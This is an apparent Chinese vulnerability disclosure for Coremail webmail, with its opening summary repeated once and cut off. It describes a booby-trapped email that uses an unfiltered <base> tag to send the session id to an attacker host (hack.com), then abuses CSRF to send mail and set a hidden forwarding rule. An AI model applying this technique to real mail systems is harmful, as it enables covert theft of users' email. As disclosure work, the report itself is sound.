VULHUB ™

### 简要描述： 利用 Coremail 邮件正文 filter 的一个漏洞，当用户打开 bad mail 时会触发 CSRF，进而设置邮件转发规则。 ### 详细说明： Coremail 把邮件正文的 ``` <img src='csrf.jpg'/> ``` 替换成 [<img src="https://images.seebug.org/upload/201406/15044338b8c6b4212d4a7f4a2538bb77212c2794.png" alt="0.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15044338b8c6b4212d4a7f4a2538bb77212c2794.png) 嗯，这里是相对地址，正巧 Coremail 没有过滤 ``` <base> ``` tag。 [<img src="https://images.seebug.org/upload/201407/231558444a9c5674e6c247e7d001f651e94ab527.jpg" alt="150444205b8cb7cb036f55091ba028a5f83fa443.png.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231558444a9c5674e6c247e7d001f651e94ab527.jpg) 以 http://mail.***.edu.cn 为例，用户浏览器会解析此地址为 http://hack.com/coremail/s?func=user:proxyGet&sid=CAPplXssSmOlqAgclQsslyZkmdzLcYdA&mid=2:1tbiAgQPE1KpqPIw4QAAsq&url=csrf.jpg hack.com 后端即可获取 sid（仍然无法获得 cookie）。 Coremail 后端 jsp 获取表单请求没有判断 POST/GET，通过 302 redirect 即可构造 CSRF。 下图是...

### 简要描述： 利用 Coremail 邮件正文 filter 的一个漏洞，当用户打开 bad mail 时会触发 CSRF，进而设置邮件转发规则。 ### 详细说明： Coremail 把邮件正文的 ``` <img src='csrf.jpg'/> ``` 替换成 [<img src="https://images.seebug.org/upload/201406/15044338b8c6b4212d4a7f4a2538bb77212c2794.png" alt="0.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/15044338b8c6b4212d4a7f4a2538bb77212c2794.png) 嗯，这里是相对地址，正巧 Coremail 没有过滤 ``` <base> ``` tag。 [<img src="https://images.seebug.org/upload/201407/231558444a9c5674e6c247e7d001f651e94ab527.jpg" alt="150444205b8cb7cb036f55091ba028a5f83fa443.png.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231558444a9c5674e6c247e7d001f651e94ab527.jpg) 以 http://mail.***.edu.cn 为例，用户浏览器会解析此地址为 http://hack.com/coremail/s?func=user:proxyGet&sid=CAPplXssSmOlqAgclQsslyZkmdzLcYdA&mid=2:1tbiAgQPE1KpqPIw4QAAsq&url=csrf.jpg hack.com 后端即可获取 sid（仍然无法获得 cookie）。 Coremail 后端 jsp 获取表单请求没有判断 POST/GET，通过 302 redirect 即可构造 CSRF。 下图是 http://hack.com/coremail/s/index.php [<img src="https://images.seebug.org/upload/201407/231558585ea4c3e520de8f3de0749c46c540687c.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231558585ea4c3e520de8f3de0749c46c540687c.jpg) 这个 CSRF 会在用户打开邮件的同时，偷偷发出一封邮件。把 img 隐藏掉即可达到隐蔽性。 同样用此漏洞来建立一条邮箱规则： [<img src="https://images.seebug.org/upload/201406/1504585932349285f075a3f1c690d844dd16b1c3.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/1504585932349285f075a3f1c690d844dd16b1c3.png) 可以达到 **在用户不知情打开一封邮件时，其邮箱自动建立一条自动转发规则** 的效果，进而窃取用户之后收到的邮件。 暂时没有找到做出蠕虫的效果。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/23155932f938bc8ee718d3144232e20fa9d60745.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/23155932f938bc8ee718d3144232e20fa9d60745.jpg) 这些邮件才不是我发的呢 = =。